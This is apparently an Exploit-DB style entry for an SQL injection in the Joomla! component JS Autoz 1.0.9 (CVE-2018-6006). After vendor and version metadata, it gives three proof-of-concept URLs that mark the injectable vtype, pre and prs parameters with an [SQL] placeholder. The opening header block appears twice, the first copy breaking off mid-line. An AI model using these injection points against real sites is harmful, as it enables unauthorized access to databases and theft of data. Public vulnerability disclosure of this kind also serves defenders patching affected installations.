# # # #
# Exploit Title: Joomla! Component JS Autoz 1.0.9 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.joomsky.com/
# Software Link: https://ex # # # #
# Exploit Title: Joomla! Component JS Autoz 1.0.9 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.joomsky.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/js-autoz/
# Software Download: http://joomsky.com/js-autoz-download.html
# Version: 1.0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6006
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&vtype=[SQL]
#
#
# 2)
# http://localhost/[PATH]/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&pre=[SQL]
#
#
# 3)
# http://localhost/[PATH]/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&prs=[SQL]
#
#
# # # #